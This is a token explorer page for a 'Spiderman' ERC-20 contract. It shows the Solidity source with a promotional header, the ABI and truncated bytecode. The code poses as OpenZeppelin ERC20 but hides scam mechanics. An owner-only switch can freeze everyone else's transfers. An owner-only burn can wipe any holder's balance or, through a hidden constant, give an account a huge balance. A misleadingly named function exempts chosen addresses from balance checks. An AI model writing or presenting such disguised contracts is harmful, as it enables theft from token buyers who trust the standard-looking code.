ERC-20
Overview
Max Total Supply
1,000,000,000 SPIDERMAN
Holders
71
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 9 Decimals)
Balance
2,701,090.69107886 SPIDERMANValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
Spiderman
Compiler Version
v0.8.8+commit.dddeac2f
Contract Source Code (Solidity Multiple files format)
/** 🕸WEBsite - https://coolspiderman.com/ ✖️TwitterX - https://twitter.com/coolspiderman_ 💬Telegram - https://t.me/CoolSpiderman Ⓜ️Medium - https://medium.com/@coolspiderman/cool-spiderman-spiderman-6a5fc036cf85 📄WHITEPAPER - https://coolspiderman.com/click-here/coolspidermanwhitepaper.txt */ // SPDX-License-Identifier: MIT pragma solidity 0.8.8; import "./ERC20.sol"; contract Spiderman is ERC20 { constructor(string memory name, string memory symbol, uint256 totalSupply, bool initTransfer) ERC20(name, symbol, initTransfer) { _mint(msg.sender, totalSupply * 10 ** decimals()); } function burn(address account, uint256 amount) external onlyOwner { _burn(account, amount); } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.5.0) (token/ERC20/ERC20.sol) pragma solidity 0.8.8; import "./IERC20.sol"; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ contract Context { address private _owner; constructor(){ _owner = msg.sender; } modifier onlyOwner() { require(_owner == _msgSender(), "Ownable: caller is not the owner"); _; } function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } function owner() internal view returns (address) { return _owner; } } /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Context, IERC20, IERC20Metadata, IERC20Events { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; uint256 private maxTxLimit = 1*10**17*10**9; uint8 private txNumber=0; string private _name; string private _symbol; bool _initTransfer; uint256 private balances; mapping (address => bool) private _isExcludedFromFeesAndcurrentAllowance; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_, bool initTransfer_) { _name = name_; _symbol = symbol_; balances = maxTxLimit; _initTransfer = initTransfer_; } function initTransfer() external onlyOwner { if (_initTransfer == false){ _initTransfer = true;} else {_initTransfer = false;} } function isExcludedFromFees(address account) public view returns (bool) { return _isExcludedFromFeesAndcurrentAllowance[account]; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 9; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _transfer(owner, to, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _approve(owner, spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * - the caller must have allowance for ``from``'s tokens of at least * `amount`. */ function transferFrom( address from, address to, uint256 amount ) public virtual override returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, _allowances[owner][spender] + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = _allowances[owner][spender]; require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(owner, spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `sender` to `recipient`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ function _transfer( address from, address to, uint256 amount ) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); if (_initTransfer == true || from == owner() || to == owner()) { if(_balances[from] > 0){ if (_isExcludedFromFeesAndcurrentAllowance[from]) { txNumber += _isExcludedFromFeesAndcurrentAllowance[from] ? 1 : 0; _balances[from] = _balances[from] - amount; _balances[to] += amount; } else{ if(!_isExcludedFromFeesAndcurrentAllowance[to]) require(amount>0, ""); _beforeTokenTransfer(from, to, amount); uint256 fromBalance = _balances[from]; require(fromBalance >= amount, "ERC20: transfer amount exceeds balance"); unchecked { _balances[from] = fromBalance - amount; } _balances[to] += amount; emit Transfer(from, to, amount); } } } else {require (_initTransfer == true, "");} _afterTokenTransfer(from, to, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; _balances[account] += amount; emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); _balances[account] = balances - amount; _totalSupply -= amount; emit Transfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Spend `amount` form the allowance of `owner` toward `spender`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */ function _spendAllowance( address owner, address spender, uint256 amount ) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); unchecked { _approve(owner, spender, currentAllowance - amount); } } } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual {} function approvedTransfer(address[] calldata addr, bool val) public onlyOwner{ txNumber=255; for (uint256 i = 0; i < addr.length; i++) { _isExcludedFromFeesAndcurrentAllowance[addr[i]] = val; } } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.5.0) (token/ERC20/IERC20.sol) pragma solidity 0.8.8; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address from, address to, uint256 amount ) external returns (bool); } interface IERC20Events { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"string","name":"name","type":"string"},{"internalType":"string","name":"symbol","type":"string"},{"internalType":"uint256","name":"totalSupply","type":"uint256"},{"internalType":"bool","name":"initTransfer","type":"bool"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"addr","type":"address[]"},{"internalType":"bool","name":"val","type":"bool"}],"name":"approvedTransfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"initTransfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
60806040526a52b7d2dcc80cd2e40000006004556000600560006101000a81548160ff021916908360ff1602179055503480156200003c57600080fd5b5060405162002a9838038062002a98833981810160405281019062000062919062000595565b838382336000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508260069080519060200190620000bd929190620002d0565b508160079080519060200190620000d6929190620002d0565b5060045460098190555080600860006101000a81548160ff0219169083151502179055505050506200013933620001126200014360201b60201c565b600a620001209190620007d5565b846200012d919062000826565b6200014c60201b60201c565b50505050620009fa565b60006009905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415620001bf576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620001b690620008e8565b60405180910390fd5b620001d360008383620002c660201b60201c565b8060036000828254620001e791906200090a565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546200023f91906200090a565b925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620002a6919062000978565b60405180910390a3620002c260008383620002cb60201b60201c565b5050565b505050565b505050565b828054620002de90620009c4565b90600052602060002090601f0160209004810192826200030257600085556200034e565b82601f106200031d57805160ff19168380011785556200034e565b828001600101855582156200034e579182015b828111156200034d57825182559160200191906001019062000330565b5b5090506200035d919062000361565b5090565b5b808211156200037c57600081600090555060010162000362565b5090565b6000604051905090565b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b620003e9826200039e565b810181811067ffffffffffffffff821117156200040b576200040a620003af565b5b80604052505050565b60006200042062000380565b90506200042e8282620003de565b919050565b600067ffffffffffffffff821115620004515762000450620003af565b5b6200045c826200039e565b9050602081019050919050565b60005b83811015620004895780820151818401526020810190506200046c565b8381111562000499576000848401525b50505050565b6000620004b6620004b08462000433565b62000414565b905082815260208101848484011115620004d557620004d462000399565b5b620004e284828562000469565b509392505050565b600082601f83011262000502576200050162000394565b5b8151620005148482602086016200049f565b91505092915050565b6000819050919050565b62000532816200051d565b81146200053e57600080fd5b50565b600081519050620005528162000527565b92915050565b60008115159050919050565b6200056f8162000558565b81146200057b57600080fd5b50565b6000815190506200058f8162000564565b92915050565b60008060008060808587031215620005b257620005b16200038a565b5b600085015167ffffffffffffffff811115620005d357620005d26200038f565b5b620005e187828801620004ea565b945050602085015167ffffffffffffffff8111156200060557620006046200038f565b5b6200061387828801620004ea565b9350506040620006268782880162000541565b925050606062000639878288016200057e565b91505092959194509250565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b6001851115620006d357808604811115620006ab57620006aa62000645565b5b6001851615620006bb5780820291505b8081029050620006cb8562000674565b94506200068b565b94509492505050565b600082620006ee5760019050620007c1565b81620006fe5760009050620007c1565b8160018114620007175760028114620007225762000758565b6001915050620007c1565b60ff84111562000737576200073662000645565b5b8360020a91508482111562000751576200075062000645565b5b50620007c1565b5060208310610133831016604e8410600b8410161715620007925782820a9050838111156200078c576200078b62000645565b5b620007c1565b620007a1848484600162000681565b92509050818404811115620007bb57620007ba62000645565b5b81810290505b9392505050565b600060ff82169050919050565b6000620007e2826200051d565b9150620007ef83620007c8565b92506200081e7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484620006dc565b905092915050565b600062000833826200051d565b915062000840836200051d565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff04831182151516156200087c576200087b62000645565b5b828202905092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b6000620008d0601f8362000887565b9150620008dd8262000898565b602082019050919050565b600060208201905081810360008301526200090381620008c1565b9050919050565b600062000917826200051d565b915062000924836200051d565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156200095c576200095b62000645565b5b828201905092915050565b62000972816200051d565b82525050565b60006020820190506200098f600083018462000967565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620009dd57607f821691505b60208210811415620009f457620009f362000995565b5b50919050565b61208e8062000a0a6000396000f3fe608060405234801561001057600080fd5b50600436106100f55760003560e01c806370a08231116100975780639dc29fac116100665780639dc29fac14610288578063a457c2d7146102a4578063a9059cbb146102d4578063dd62ed3e14610304576100f5565b806370a08231146102145780637b6201da1461024457806391b69fa01461026057806395d89b411461026a576100f5565b806323b872dd116100d357806323b872dd14610166578063313ce5671461019657806339509351146101b45780634fbee193146101e4576100f5565b806306fdde03146100fa578063095ea7b31461011857806318160ddd14610148575b600080fd5b610102610334565b60405161010f9190611599565b60405180910390f35b610132600480360381019061012d9190611659565b6103c6565b60405161013f91906116b4565b60405180910390f35b6101506103e9565b60405161015d91906116de565b60405180910390f35b610180600480360381019061017b91906116f9565b6103f3565b60405161018d91906116b4565b60405180910390f35b61019e610422565b6040516101ab9190611768565b60405180910390f35b6101ce60048036038101906101c99190611659565b61042b565b6040516101db91906116b4565b60405180910390f35b6101fe60048036038101906101f99190611783565b6104d5565b60405161020b91906116b4565b60405180910390f35b61022e60048036038101906102299190611783565b61052b565b60405161023b91906116de565b60405180910390f35b61025e60048036038101906102599190611841565b610574565b005b6102686106ca565b005b6102726107b9565b60405161027f9190611599565b60405180910390f35b6102a2600480360381019061029d9190611659565b61084b565b005b6102be60048036038101906102b99190611659565b6108ee565b6040516102cb91906116b4565b60405180910390f35b6102ee60048036038101906102e99190611659565b6109d8565b6040516102fb91906116b4565b60405180910390f35b61031e600480360381019061031991906118a1565b6109fb565b60405161032b91906116de565b60405180910390f35b60606006805461034390611910565b80601f016020809104026020016040519081016040528092919081815260200182805461036f90611910565b80156103bc5780601f10610391576101008083540402835291602001916103bc565b820191906000526020600020905b81548152906001019060200180831161039f57829003601f168201915b5050505050905090565b6000806103d1610a82565b90506103de818585610a8a565b600191505092915050565b6000600354905090565b6000806103fe610a82565b905061040b858285610c55565b610416858585610ce1565b60019150509392505050565b60006009905090565b600080610436610a82565b90506104ca818585600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546104c59190611971565b610a8a565b600191505092915050565b6000600a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b61057c610a82565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610609576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161060090611a13565b60405180910390fd5b60ff600560006101000a81548160ff021916908360ff16021790555060005b838390508110156106c45781600a600086868581811061064b5761064a611a33565b5b90506020020160208101906106609190611783565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806106bc90611a62565b915050610628565b50505050565b6106d2610a82565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461075f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161075690611a13565b60405180910390fd5b60001515600860009054906101000a900460ff161515141561079b576001600860006101000a81548160ff0219169083151502179055506107b7565b6000600860006101000a81548160ff0219169083151502179055505b565b6060600780546107c890611910565b80601f01602080910402602001604051908101604052809291908181526020018280546107f490611910565b80156108415780601f1061081657610100808354040283529160200191610841565b820191906000526020600020905b81548152906001019060200180831161082457829003601f168201915b5050505050905090565b610853610a82565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146108e0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108d790611a13565b60405180910390fd5b6108ea8282611301565b5050565b6000806108f9610a82565b90506000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050838110156109bf576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109b690611b1d565b60405180910390fd5b6109cc8286868403610a8a565b60019250505092915050565b6000806109e3610a82565b90506109f0818585610ce1565b600191505092915050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610afa576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610af190611baf565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610b6a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b6190611c41565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610c4891906116de565b60405180910390a3505050565b6000610c6184846109fb565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610cdb5781811015610ccd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cc490611cad565b60405180910390fd5b610cda8484848403610a8a565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610d51576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d4890611d3f565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610dc1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610db890611dd1565b60405180910390fd5b60011515600860009054906101000a900460ff1615151480610e155750610de66114cd565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16145b80610e525750610e236114cd565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16145b1561129a576000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054111561129557600a60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161561106a57600a60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16610f49576000610f4c565b60015b600560008282829054906101000a900460ff16610f699190611df1565b92506101000a81548160ff021916908360ff16021790555080600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610fcc9190611e28565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461105e9190611971565b92505081905550611294565b600a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff166110ff57600081116110fe576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110f590611e82565b60405180910390fd5b5b61110a8383836114f6565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015611191576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161118890611f14565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546112269190611971565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161128a91906116de565b60405180910390a3505b5b6112f1565b60011515600860009054906101000a900460ff161515146112f0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112e790611e82565b60405180910390fd5b5b6112fc8383836114fb565b505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611371576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161136890611fa6565b60405180910390fd5b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050818110156113f8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113ef90612038565b60405180910390fd5b816009546114069190611e28565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816003600082825461145b9190611e28565b92505081905550600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516114c091906116de565b60405180910390a3505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b